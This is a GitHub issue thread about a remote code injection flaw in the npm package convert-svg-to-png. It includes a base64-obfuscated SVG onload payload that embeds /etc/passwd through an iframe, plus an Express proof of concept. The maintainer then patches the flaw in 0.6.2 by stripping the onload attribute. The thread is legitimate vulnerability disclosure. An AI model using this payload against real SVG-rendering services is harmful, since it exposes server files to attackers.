Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Remote Code Injection vulnerable #81

Closed
0xmanhnv opened this issue May 26, 2022 · 11 comments · Fixed by #82
Closed

Remote Code Injection vulnerable #81

0xmanhnv opened this issue May 26, 2022 · 11 comments · Fixed by #82
Labels
Milestone

Comments

@0xmanhnv
Copy link

Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file.

poc

@0xmanhnv
Copy link
Author

@neocotic

@neocotic
Copy link
Owner

This has been fixed in the latest major release but the CVE hasn't been updated yet.

@0xmanhnv
Copy link
Author

0xmanhnv commented May 28, 2022

@neocotic no, this is new vulnerability.

I tried with the new version but this security vulnerability exists

@0xmanhnv
Copy link
Author

0xmanhnv commented May 28, 2022

Payload

<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>

POC

const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>`;
// YWxlcnQoMSk=
// function newContent(){document.open(),document.write('<text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text>'),document.close()}
const app = express();
app.get('/poc', async (req, res)=>{
  try {
    const png = await convert(fileSvg);
    res.set('Content-Type', 'image/png');
    res.send(png);
  } catch (e) {
      console.log(e);
    res.send("");
  }
});
app.listen(3000, ()=>{
  console.log('started');
});

@0xmanhnv
Copy link
Author

0xmanhnv commented May 28, 2022

I checked on the latest version

Screen Shot 2022-05-28 at 15 15 25

Latest version on NPM

Screen Shot 2022-05-28 at 15 17 16

@neocotic
Copy link
Owner

Great find. Since we're now using cheerio to validate input, we should be able to easily strip the onload attribute. Are there any others that you think could be used to exploit in this way or any other nested elements within the SVG, other than the root that this needs to be applied to?

@0xmanhnv
Copy link
Author

0xmanhnv commented May 28, 2022

I will try to add some other ways that I think it works then I'll let you know.

but this is clearly a CVE, right?
@neocotic

@neocotic
Copy link
Owner

It looks like it to me. I'll try to get a patch together over this weekend for it. If you find any other ways let me know and I'll add them but I'll concentrate on the known attack vector for now

@0xmanhnv
Copy link
Author

@neocotic yes,
But can i claim a CVE?

@neocotic
Copy link
Owner

No idea. Might be good to have a patch available beforehand

neocotic added a commit that referenced this issue May 29, 2022
In order to prevent a remote code injection, the `onload` attribute needs to be removed from the SVG input as Puppeteer/Chromium will execute any code within it which could potentially be malicious.

Fixes #81
@neocotic neocotic added this to the 0.6.2 milestone May 29, 2022
@neocotic neocotic added the bug label May 29, 2022
neocotic added a commit that referenced this issue May 29, 2022
In order to prevent a remote code injection, the `onload` attribute needs to be removed from the SVG input as Puppeteer/Chromium will execute any code within it which could potentially be malicious.

Fixes #81
@neocotic
Copy link
Owner

@0xmanhnv A fix has now been released in 0.6.2. If you find any other attack vectors (e.g. other event listener attributes) then please raise another issue/PR and we can get it patched.

Please feel free to open a CVE for this vulnerability now with a upgrade path to 0.6.2 mentioned as a solution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants